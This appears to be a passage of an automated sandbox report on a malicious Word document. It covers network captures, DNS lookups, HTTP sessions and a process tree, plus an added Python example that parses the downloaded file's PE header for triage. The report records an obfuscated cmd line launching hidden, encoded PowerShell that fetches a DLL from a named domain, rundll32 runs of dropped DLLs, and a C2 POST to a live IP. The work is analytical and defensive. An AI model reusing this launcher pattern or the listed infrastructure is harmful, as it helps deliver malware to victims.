                      Jan 12, 2021 20:31:05.219939947 CET | 49167 | 80 | 192.168.2.22 | 109.232.216.177
                      Jan 12, 2021 20:31:05.292373896 CET | 80 | 49167 | 109.232.216.177 | 192.168.2.22
                      Jan 12, 2021 20:31:05.292434931 CET | 80 | 49167 | 109.232.216.177 | 192.168.2.22
                      Jan 12, 2021 20:31:05.292473078 CET | 80 | 49167 | 109.232.216.177 | 192.168.2.22
                      Jan 12, 2021 20:31:05.292522907 CET | 80 | 49167 | 109.232.216.177 | 192.168.2.22
                      Jan 12, 2021 20:31:05.292534113 CET | 49167 | 80 | 192.168.2.22 | 109.232.216.177
                      Jan 12, 2021 20:31:05.292566061 CET | 80 | 49167 | 109.232.216.177 | 192.168.2.22
                      Jan 12, 2021 20:31:05.292607069 CET | 80 | 49167 | 109.232.216.177 | 192.168.2.22
                      Jan 12, 2021 20:31:05.292612076 CET | 49167 | 80 | 192.168.2.22 | 109.232.216.177
                      Jan 12, 2021 20:31:05.292649031 CET | 80 | 49167 | 109.232.216.177 | 192.168.2.22
                      Jan 12, 2021 20:31:05.292681932 CET | 49167 | 80 | 192.168.2.22 | 109.232.216.177
                      Jan 12, 2021 20:31:05.292687893 CET | 80 | 49167 | 109.232.216.177 | 192.168.2.22
                      Jan 12, 2021 20:31:05.292726040 CET | 80 | 49167 | 109.232.216.177 | 192.168.2.22
                      Jan 12, 2021 20:31:05.292762995 CET | 49167 | 80 | 192.168.2.22 | 109.232.216.177
                      Jan 12, 2021 20:31:05.292767048 CET | 80 | 49167 | 109.232.216.177 | 192.168.2.22
                      Jan 12, 2021 20:31:05.292807102 CET | 80 | 49167 | 109.232.216.177 | 192.168.2.22
                      Jan 12, 2021 20:31:05.292835951 CET | 49167 | 80 | 192.168.2.22 | 109.232.216.177
                      Jan 12, 2021 20:31:05.292855978 CET | 80 | 49167 | 109.232.216.177 | 192.168.2.22
                      Jan 12, 2021 20:31:05.292905092 CET | 80 | 49167 | 109.232.216.177 | 192.168.2.22
                      Jan 12, 2021 20:31:05.292927980 CET | 49167 | 80 | 192.168.2.22 | 109.232.216.177
                      Jan 12, 2021 20:31:05.292943954 CET | 80 | 49167 | 109.232.216.177 | 192.168.2.22
                      Jan 12, 2021 20:31:05.292983055 CET | 80 | 49167 | 109.232.216.177 | 192.168.2.22
                      Jan 12, 2021 20:31:05.293020010 CET | 49167 | 80 | 192.168.2.22 | 109.232.216.177
                      Jan 12, 2021 20:31:05.293021917 CET | 80 | 49167 | 109.232.216.177 | 192.168.2.22
                      Jan 12, 2021 20:31:05.293061018 CET | 80 | 49167 | 109.232.216.177 | 192.168.2.22
                      Jan 12, 2021 20:31:05.293096066 CET | 49167 | 80 | 192.168.2.22 | 109.232.216.177
                      Jan 12, 2021 20:31:05.293101072 CET | 80 | 49167 | 109.232.216.177 | 192.168.2.22
                      Jan 12, 2021 20:31:05.293140888 CET | 80 | 49167 | 109.232.216.177 | 192.168.2.22
                      Jan 12, 2021 20:31:05.293171883 CET | 49167 | 80 | 192.168.2.22 | 109.232.216.177
                      Jan 12, 2021 20:31:05.293190002 CET | 80 | 49167 | 109.232.216.177 | 192.168.2.22
                      Jan 12, 2021 20:31:05.293261051 CET | 49167 | 80 | 192.168.2.22 | 109.232.216.177
                      Jan 12, 2021 20:31:05.365664005 CET | 80 | 49167 | 109.232.216.177 | 192.168.2.22
                      Jan 12, 2021 20:31:05.365725040 CET | 80 | 49167 | 109.232.216.177 | 192.168.2.22
                      Jan 12, 2021 20:31:05.365765095 CET | 80 | 49167 | 109.232.216.177 | 192.168.2.22
                      Jan 12, 2021 20:31:05.365806103 CET | 80 | 49167 | 109.232.216.177 | 192.168.2.22
                      Jan 12, 2021 20:31:05.365842104 CET | 49167 | 80 | 192.168.2.22 | 109.232.216.177
                      Jan 12, 2021 20:31:05.365865946 CET | 80 | 49167 | 109.232.216.177 | 192.168.2.22
                      Jan 12, 2021 20:31:05.365890980 CET | 49167 | 80 | 192.168.2.22 | 109.232.216.177
                      Jan 12, 2021 20:31:05.365915060 CET | 80 | 49167 | 109.232.216.177 | 192.168.2.22
                      Jan 12, 2021 20:31:05.365953922 CET | 80 | 49167 | 109.232.216.177 | 192.168.2.22
                      Jan 12, 2021 20:31:05.365983009 CET | 49167 | 80 | 192.168.2.22 | 109.232.216.177
                      Jan 12, 2021 20:31:05.365993023 CET | 80 | 49167 | 109.232.216.177 | 192.168.2.22
                      Jan 12, 2021 20:31:05.366033077 CET | 80 | 49167 | 109.232.216.177 | 192.168.2.22
                      Jan 12, 2021 20:31:05.366055965 CET | 49167 | 80 | 192.168.2.22 | 109.232.216.177
                      Jan 12, 2021 20:31:05.366070986 CET | 80 | 49167 | 109.232.216.177 | 192.168.2.22
                      Jan 12, 2021 20:31:05.366110086 CET | 80 | 49167 | 109.232.216.177 | 192.168.2.22
                      Jan 12, 2021 20:31:05.366134882 CET | 49167 | 80 | 192.168.2.22 | 109.232.216.177
                      Jan 12, 2021 20:31:05.366153955 CET | 80 | 49167 | 109.232.216.177 | 192.168.2.22
                      Jan 12, 2021 20:31:05.366203070 CET | 80 | 49167 | 109.232.216.177 | 192.168.2.22
                      Jan 12, 2021 20:31:05.366208076 CET | 49167 | 80 | 192.168.2.22 | 109.232.216.177
                      Jan 12, 2021 20:31:05.366245031 CET | 80 | 49167 | 109.232.216.177 | 192.168.2.22
                      Jan 12, 2021 20:31:05.366283894 CET | 80 | 49167 | 109.232.216.177 | 192.168.2.22
                      Jan 12, 2021 20:31:05.366307974 CET | 49167 | 80 | 192.168.2.22 | 109.232.216.177
                      Jan 12, 2021 20:31:05.366324902 CET | 80 | 49167 | 109.232.216.177 | 192.168.2.22
                      Jan 12, 2021 20:31:05.366364956 CET | 80 | 49167 | 109.232.216.177 | 192.168.2.22
                      Jan 12, 2021 20:31:05.366388083 CET | 49167 | 80 | 192.168.2.22 | 109.232.216.177
                      Jan 12, 2021 20:31:05.366400957 CET | 80 | 49167 | 109.232.216.177 | 192.168.2.22
                      Jan 12, 2021 20:31:05.366441965 CET | 80 | 49167 | 109.232.216.177 | 192.168.2.22

                      UDP Packets

                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                      Jan 12, 2021 20:31:04.424675941 CET | 52197 | 53 | 192.168.2.22 | 8.8.8.8
                      Jan 12, 2021 20:31:04.484715939 CET | 53 | 52197 | 8.8.8.8 | 192.168.2.22
                      Jan 12, 2021 20:31:05.009018898 CET | 53099 | 53 | 192.168.2.22 | 8.8.8.8
                      Jan 12, 2021 20:31:05.065613985 CET | 53 | 53099 | 8.8.8.8 | 192.168.2.22

                      DNS Queries

                      Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                      Jan 12, 2021 20:31:04.424675941 CET | 192.168.2.22 | 8.8.8.8 | 0x71dd | Standard query (0) | remediis.com | A (IP address) | IN (0x0001)
                      Jan 12, 2021 20:31:05.009018898 CET | 192.168.2.22 | 8.8.8.8 | 0x8b68 | Standard query (0) | avadnansahin.com | A (IP address) | IN (0x0001)

                      DNS Answers

                      Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                      Jan 12, 2021 20:31:04.484715939 CET | 8.8.8.8 | 192.168.2.22 | 0x71dd | No error (0) | remediis.com | (none) | 5.2.81.171 | A (IP address) | IN (0x0001)
                      Jan 12, 2021 20:31:05.065613985 CET | 8.8.8.8 | 192.168.2.22 | 0x8b68 | No error (0) | avadnansahin.com | (none) | 109.232.216.177 | A (IP address) | IN (0x0001)

                      HTTP Request Dependency Graph

                      • avadnansahin.com
                      • 69.49.88.46

                      HTTP Packets

                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                      0 | 192.168.2.22 | 49167 | 109.232.216.177 | 80 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      Timestamp | kBytes transferred | Direction | Data
                      Jan 12, 2021 20:31:05.140002012 CET | 3 | OUT | GET /wp-includes/w/ HTTP/1.1
                      Host: avadnansahin.com
                      Connection: Keep-Alive
                      Jan 12, 2021 20:31:05.219491005 CET | 4 | IN | HTTP/1.1 200 OK
                      Connection: Keep-Alive
                      X-Powered-By: PHP/7.0.33
                      Set-Cookie: 5ffdf8f92dc15=1610479865; expires=Tue, 12-Jan-2021 19:32:05 GMT; Max-Age=60; path=/
                      Cache-Control: no-cache, must-revalidate
                      Pragma: no-cache
                      Last-Modified: Tue, 12 Jan 2021 19:31:05 GMT
                      Expires: Tue, 12 Jan 2021 19:31:05 GMT
                      Content-Type: application/octet-stream
                      Content-Disposition: attachment; filename="Rq7pzbnT415DFc.dll"
                      Content-Transfer-Encoding: binary
                      Transfer-Encoding: chunked
                      Date: Tue, 12 Jan 2021 19:31:05 GMT
                      Data Raw: 31 30 30 30 30 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 5a de fd 5f 00 00 00 00 00 00 00 00 e0 00 0e 21 0b 01 02 32 00 46 00 00 00 d4 04 00 00 00 00 00 f0 21 00 00 00 10 00 00 00 60 00 00 00 00 00 10 00 10 00 00 00 02 00 00 03 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 05 00 00 04 00 00 01 09 06 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 fc 70 00 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 05 00 58 15 00 00 00 50 05 00 d4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 72 00 00 18 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8b 43 00 00 00 10 00 00 00 44 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 0c 01 00 00 00 60 00 00 00 02 00 00 00 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 d8 08 00 00 00 70 00 00 00 0a 00 00 00 4a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 65 78 74 34 00 00 a4 bf 04 00 00 80 00 00 00 c0 04 00 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 65 78 74 35 00 00 64 00 00 00 00 40 05 00 00 02 00 00 00 14 05 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 40 2e 72 65 6c 6f 63 00 00 d4 07 00 00 00 50 05 00 00 08 00 00 00 16 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Data Ascii: 10000MZ@!L!This program cannot be run in DOS mode.$PELZ_!2F!``pdXPxr.textCD `.rdata`H@@.datapJ@.text4T@.text5d@ @.relocP@B
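
Session 0 is the PowerShell stage fetching its second-stage DLL: a GET to a WordPress path on avadnansahin.com is answered with application/octet-stream, a Content-Disposition attachment named Rq7pzbnT415DFc.dll and a chunked body whose first chunk ("10000", 64 KiB) opens with an MZ header. The Python below is an added example, not code from the report or from Joe Sandbox. It reassembles a chunked body while tolerating a capture that stops mid-chunk (as the hex dump on the page does), reads the COFF header at e_lfanew, and combines those findings with the response headers into a short list of reasons to flag the download. The sample body is constructed from the values visible in the dump (chunk-size line, standard DOS stub, PE signature and the first 24 bytes of the COFF and optional headers); the rest of the DLL is not on the page.

```python
"""Reassemble a chunked HTTP body and inspect the PE header. Added example; not from the report."""
import re
from datetime import datetime, timezone

# Response headers exactly as recorded for session 0 on the page.
SAMPLE_HEADERS = {
    "Content-Type": "application/octet-stream",
    "Content-Disposition": 'attachment; filename="Rq7pzbnT415DFc.dll"',
    "Content-Transfer-Encoding": "binary",
    "Transfer-Encoding": "chunked",
}

# Constructed body: the first 0x9c bytes of the dump. The chunk-size line says
# 0x10000 bytes follow, so everything after these bytes is a truncated capture.
DOS_STUB = bytes.fromhex(
    "4d5a9000" "03000000" "04000000" "ffff0000" "b8000000" "00000000" "40000000" "00000000"
    + "00000000" * 7 + "80000000"            # e_lfanew = 0x80 at offset 0x3c
    + "0e1fba0e" "00b409cd" "21b8014c" "cd21"
) + b"This program cannot be run in DOS mode.\r\r\n$" + b"\0" * 7
PE_HEADER = bytes.fromhex(
    "50450000" "4c010600" "5adefd5f" "00000000" "00000000" "e0000e21" "0b010232"
)
SAMPLE_BODY = b"10000\r\n" + DOS_STUB + PE_HEADER


def dechunk(body: bytes) -> bytes:
    """Decode Transfer-Encoding: chunked. A capture cut off inside a chunk yields
    the bytes that are present instead of an error, so triage can still proceed."""
    out, pos = bytearray(), 0
    while True:
        nl = body.find(b"\r\n", pos)
        if nl < 0:
            break                                   # no complete size line left
        size_field = body[pos:nl].split(b";", 1)[0].strip()  # ignore chunk extensions
        try:
            size = int(size_field, 16)
        except ValueError:
            break                                   # not a chunk-size line
        if size == 0:
            break                                   # last-chunk marker
        chunk = body[nl + 2:nl + 2 + size]
        out += chunk
        if len(chunk) < size:
            break                                   # truncated capture
        pos = nl + 2 + size + 2                     # skip the chunk's trailing CRLF
    return bytes(out)


def pe_summary(data: bytes):
    """Return None unless `data` starts with a well-formed MZ/PE pair; otherwise
    the COFF fields that matter for a first look."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    off = int.from_bytes(data[0x3C:0x40], "little")            # e_lfanew
    if data[off:off + 4] != b"PE\0\0" or len(data) < off + 26:
        return None
    machine = int.from_bytes(data[off + 4:off + 6], "little")
    sections = int.from_bytes(data[off + 6:off + 8], "little")
    stamp = int.from_bytes(data[off + 8:off + 12], "little")
    characteristics = int.from_bytes(data[off + 22:off + 24], "little")
    magic = int.from_bytes(data[off + 24:off + 26], "little")  # optional header Magic
    return {
        "machine": {0x14C: "i386", 0x8664: "x86-64"}.get(machine, hex(machine)),
        "sections": sections,
        "timestamp": stamp,
        "compiled_utc": datetime.fromtimestamp(stamp, timezone.utc).strftime("%Y-%m-%d %H:%M:%S"),
        "is_dll": bool(characteristics & 0x2000),   # IMAGE_FILE_DLL
        "pe32": magic == 0x10B,                     # 0x20B would be PE32+
    }


def review_download(headers: dict, body: bytes) -> list:
    """List the reasons this response deserves attention; empty means none matched."""
    reasons = []
    h = {k.lower(): v for k, v in headers.items()}
    m = re.search(r'filename="?([^";]+)', h.get("content-disposition", ""), re.I)
    if m and m.group(1).lower().endswith((".dll", ".exe")):
        reasons.append(f"served as attachment {m.group(1)}")
    if h.get("content-type", "").lower().startswith("application/octet-stream"):
        reasons.append("opaque content-type")
    payload = dechunk(body) if "chunked" in h.get("transfer-encoding", "").lower() else body
    pe = pe_summary(payload)
    if pe:
        kind = "DLL" if pe["is_dll"] else "EXE"
        reasons.append(f"body is a {pe['machine']} PE {kind} built {pe['compiled_utc']} UTC")
    return reasons


if __name__ == "__main__":
    for reason in review_download(SAMPLE_HEADERS, SAMPLE_BODY):
        print("-", reason)
```

On the page's bytes this reports an i386 PE32 DLL with six sections (the dump's section table names .text, .rdata, .data, .text4, .text5 and .reloc) and a TimeDateStamp of 0x5ffdde5a, which is 2021-01-12 17:37:30 UTC: under two hours before the 19:31:05 GMT Date header on the same response, and consistent with the file landing in rundll32.exe a few seconds later in session 1.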


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                      1 | 192.168.2.22 | 49169 | 69.49.88.46 | 80 | C:\Windows\SysWOW64\rundll32.exe
                      Timestamp | kBytes transferred | Direction | Data
                      Jan 12, 2021 20:31:34.827358961 CET | 358 | OUT | POST /fumwyj93myhz6vi/3lptbz7/e6hqkyw77ui/dujy6/2toe6aqef56s/cxrwnsqx/ HTTP/1.1
                      DNT: 0
                      Referer: 69.49.88.46/fumwyj93myhz6vi/3lptbz7/e6hqkyw77ui/dujy6/2toe6aqef56s/cxrwnsqx/
                      Content-Type: multipart/form-data; boundary=-------------------HZtvsb4iqah9tnyW329
                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                      Host: 69.49.88.46
                      Content-Length: 5492
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Jan 12, 2021 20:31:37.310410976 CET | 365 | IN | HTTP/1.1 200 OK
                      Server: nginx
                      Date: Tue, 12 Jan 2021 19:31:37 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Vary: Accept-Encoding
                      Data Raw: 66 30 34 0d 0a 5c b4 e8 0a df c8 fc 15 5f 14 03 90 17 91 42 95 bb 60 9b 10 9a 31 8d f3 aa e5 ca 57 d1 60 dc 2a 41 15 f0 08 8c 83 69 a7 3e 6e 91 b1 28 72 e9 02 0f d2 29 ab dc 4e e4 d8 82 38 74 3c b7 d7 70 98 a0 07 f2 2a e1 a8 15 da d3 60 74 37 51 a7 33 46 fb 40 f6 9d 64 40 be 1d 2a 15 09 7e 09 d0 1d 3c 49 e9 08 d7 30 aa 4b fb 05 91 50 2b d7 39 13 2a 6d 3c f5 e4 bd 5c 37 20 7d a6 2e b0 32 8d ec 9b e0 17 e8 8f b6 02 1b 91 9a 06 5b a8 35 10 4d db b4 8c 1d 85 7a 70 9a 1e fb b3 9b 01 80 2a 15 4f 86 81 0f 9a 03 8e 86 62 9b ba 01 61 eb a6 b2 7d a9 7b 65 4b e5 d5 28 ee 2a 77 71 59 7e d9 b8 ef a3 b7 93 25 49 cc b8 76 8d 68 41 4e 7e 19 45 99 14 c0 e5 b1 ef d4 24 5b a4 6d 8e c4 f2 ac 70 28 3d 60 1b 6a 87 dd ca c3 fa 6d 58 4b ba 20 a3 51 19 f1 ea e9 00 54 52 62 a8 de a7 fd d2 a4 f7 a6 b3 2c 55 cb 25 8d 8b 94 58 ff c3 bb f2 af 34 8b 7f 1f 1c 1e 32 14 48 93 36 bc b5 78 ab a5 46 33 2f 34 8d c0 cd 2a eb 75 b0 d9 7b 8d 34 21 c0 20 84 0a 0b f8 9f c3 35 d8 a8 ef 4c 21 9d dd 3e dc 59 91 7a b3 8c f1 85 aa 2f 0c d8 62 a4 13 1d ed 7b f9 d9 8d 53 3a a6 3e 5c 4a e1 3a 00 62 19 b7 8a 3c 2d 43 aa ba 94 4f 74 23 00 7f 39 2b dc 08 38 b5 8b 60 13 aa 85 fd 7c 75 fc ba 9b 0f 87 21 ca 99 7b 5f 31 ee 73 68 01 87 a9 9f 9b a0 79 ef 78 b0 8f 66 a3 f7 d1 02 39 52 2f f1 09 2c 52 56 58 b3 b5 a4 d7 f2 89 1d e2 6e 2e c2 4d 96 7b fa 37 99 c7 7c 36 e2 24 f7 0b 77 62 69 be 7f d1 cf 5a 22 60 39 11 7e 2a fc 94 25 9c 3f 79 15 50 2a 34 6c a0 15 d6 8c 8f 53 21 eb 67 2d b1 ee d8 43 30 f1 bb cb 7c d6 cd 1e 75 2b 45 bf d4 2b 88 c1 7f 77 4f 23 fe 8b 63 24 62 2b d9 87 f9 9a fd 9c 5c b7 45 47 72 19 d7 40 4a 78 66 3b 5b 6e e7 96 4a c2 48 24 15 ff e7 99 e9 07 5a 1e 8d 85 e7 ee 0a 83 46 93 63 82 76 7a ff 20 4c 6b 0a b6 1f 40 af 92 7d 49 7c a5 00 15 f6 3a 21 14 95 44 0e a9 e4 1d f3 69 1e 88 f4 f9 2d 7c 4f 3f 2e a3 a9 d1 80 08 11 3d 75 b3 dd 32 9f 91 02 62 66 34 25 74 ec a3 d9 d9 70 46 54 11 63 76 42 da cc 5d 85 22 60 e9 27 1f cc 02 c9 e7 fc 51 a4 1d 1e e3 9f 0c 3b ec 7c ed 81 8f 48 63 13 ce 0f 
d5 2e 54 d7 fd 43 0d 81 b7 70 ab 2c b1 57 57 c4 26 e8 33 f0 25 fa 01 1e 47 28 bd cb ab 6d 8c e2 7e b2 dd ae 4e 20 22 6e af 53 0c 53 28 ea 98 d9 e0 e4 7b 70 c4 d1 db ad 5d 0c 16 40 dc 43 e5 bf b4 e2 db 78 a2 a9 ad ae 0f 3b af 8f 66 e1 b3 34 97 41 7d b1 45 0f 33 ef 53 1f 27 b5 06 10 b6 a5 2f 24 e9 27 89 14 8b 48 69 0e 69 66 f8 ee 9e de 5d a3 ca 7a f6 77 57 4b 59 96 5c 8c 99 8b 18 e8 de 20 6f 8b 1f 30 c0 29 8f 2e ee c1 cb d8 1b 1d 73 b7 78 a6 1a 0c 28 c6 8a 82 09 01 0e e0 d2 8f a1 78 8c d2 f4 f6 b9 18 58 d7 94 d2 00 2d b4 ea 85 60 20 c9 dc 37 c2 a8 a7 b4 5e b5 06 08 8f 69 dc 9b b6 1f 3b 02 31 c2 21 26 eb 69 6a 09 ec 89 06 73 49 16 83 63 78 bb 4a d7 1a 01 4b a8 02 d1 61 55 92 3f 30 52 f9 91 e5 3d fc 91 b4 f0 32 e2 90 86 d8 94 f6 db e0 ae 9e 12 a3 87 17 99 ab 97 8b a5 5a de 5b 4c 32 39 58 94 ef 1b 71 02 74 c6 9f f5 56 8a 10 e6 4e b1 b7 43 49 b2 1a 79 6b 22 37 8a c0 85 00 2b 7f 52 f5 de dd ac a5 90 3d 2a 1d f5 59 a7 2c 7e ee a9 11 7f 05 82 81 ce 5d fd 09 06 f5 e4 fb f0 1c 13 d5 d2 64 94 c1 f1 85 ec 84 11 ce 22 52 82 15 2d b4 a2 f1 0f d4 b0 08 b3 c2 f9 83 39 a1 2b 05 44 db 95 53 16 9d f5 62 1d e0 bb 89 97 a4 f5 32 99 27 ca 0b 22 03 3a b1 df 8b a2 ca a7 1e 77 6c 5b 36 bd 12 42 19 ff 20 86 5d 8b 0b 04 c6 af 05 ca cf 46 5d dc e3 c9 f2 f6 fa 05 2d 88 87 bf 2a 65 28 ce 9b 59 e3 06 c2 df 82 1b ac 8d 8b 64 1d b2 23 6e 43 07 31 82 62 a4 e2 7b 52 da 25 48 2f 12 2b 06 79 20 ee cd 6b 1a 43 f7 b7 17 5e 48 f9 35 bf 34 85 46 f3 8e 01 53 7e c1 00 d6 bc f8 f7 92 c7 af 8e 73 64 7b 63 1e
                      Data Ascii: f04\_B`1W`*Ai>n(r)N8t<p*`t7Q3F@d@*~<I0KP+9*m<\7 }.2[5Mzp*Oba}{eK(*wqY~%IvhAN~E$[mp(=`jmXK QTRb,U%X42H6xF3/4*u{4! 5L!>Yz/b{S:>\J:b<-COt#9+8`|u!{_1shyxf9R/,RVXn.M{7|6$wbiZ"`9~*%?yP*4lS!g-C0|u+E+wO#c$b+\EGr@Jxf;[nJH$ZFcvz Lk@}I|:!Di-|O?.=u2bf4%tpFTcvB]"`'Q;|Hc.TCp,WW&3%G(m~N "nSS({p]@Cx;f4A}E3S'/$'Hiif]zwWKY\ o0).sx(xX-` 7^i;1!&ijsIcxJKaU?0R=2Z[L29XqtVNCIyk"7+R=*Y,~]d"R-9+DSb2'":wl[6B ]F]-*e(Yd#nC1b{R%H/+y kC^H54FS~sd{c


                      Code Manipulations

                      Statistics

                      Behavior


                      System Behavior

                      General

                      Start time:20:30:34
                      Start date:12/01/2021
                      Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                      Wow64 process (32bit):false
                      Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                      Imagebase:0x13f120000
                      File size:1424032 bytes
                      MD5 hash:95C38D04597050285A18F66039EDB456
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      General

                      Start time:20:30:35
                      Start date:12/01/2021
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc 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
                      Imagebase:0x4a3f0000
                      File size:345088 bytes
                      MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate

                      General

                      Start time:20:30:36
                      Start date:12/01/2021
                      Path:C:\Windows\System32\msg.exe
                      Wow64 process (32bit):false
                      Commandline:msg user /v Word experienced an error trying to open the file.
                      Imagebase:0xff0f0000
                      File size:26112 bytes
                      MD5 hash:2214979661E779C3E3C33D4F14E6F3AC
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate

                      General

                      Start time:20:30:36
                      Start date:12/01/2021
                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):false
                      Commandline:powershell -w hidden -enc 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
                      Imagebase:0x13fab0000
                      File size:473600 bytes
                      MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:.Net C# or VB.NET
                      Reputation:high

                      General

                      Start time:20:30:40
                      Start date:12/01/2021
                      Path:C:\Windows\System32\rundll32.exe
                      Wow64 process (32bit):false
                      Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\Kjl48kr\Nqm9ty9\S93E.dll ShowDialogA
                      Imagebase:0xffdd0000
                      File size:45568 bytes
                      MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate

                      General

                      Start time:20:30:40
                      Start date:12/01/2021
                      Path:C:\Windows\SysWOW64\rundll32.exe
                      Wow64 process (32bit):true
                      Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\Kjl48kr\Nqm9ty9\S93E.dll ShowDialogA
                      Imagebase:0x50000
                      File size:44544 bytes
                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate

                      General

                      Start time:20:30:41
                      Start date:12/01/2021
                      Path:C:\Windows\SysWOW64\rundll32.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Giyrh\pugu.vsm',ShowDialogA
                      Imagebase:0x50000
                      File size:44544 bytes
                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate

                      General

                      Start time:20:30:42
                      Start date:12/01/2021
                      Path:C:\Windows\SysWOW64\rundll32.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ivtnyogqxjx\ctmhexvkrv.xdn',ShowDialogA
                      Imagebase:0x50000
                      File size:44544 bytes
                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate

                      General

                      Start time:20:30:43
                      Start date:12/01/2021
                      Path:C:\Windows\SysWOW64\rundll32.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pvbzatsazzovzkv\hcdstjffkhswof.tvm',ShowDialogA
                      Imagebase:0x50000
                      File size:44544 bytes
                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate

                      General

                      Start time:20:30:44
                      Start date:12/01/2021
                      Path:C:\Windows\SysWOW64\rundll32.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ipdtn\rmgx.ktd',ShowDialogA
                      Imagebase:0x50000
                      File size:44544 bytes
                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate

                      General

                      Start time:20:30:45
                      Start date:12/01/2021
                      Path:C:\Windows\SysWOW64\rundll32.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wxiibgduobebnp\hfpumnmgeezpt.jsh',ShowDialogA
                      Imagebase:0x50000
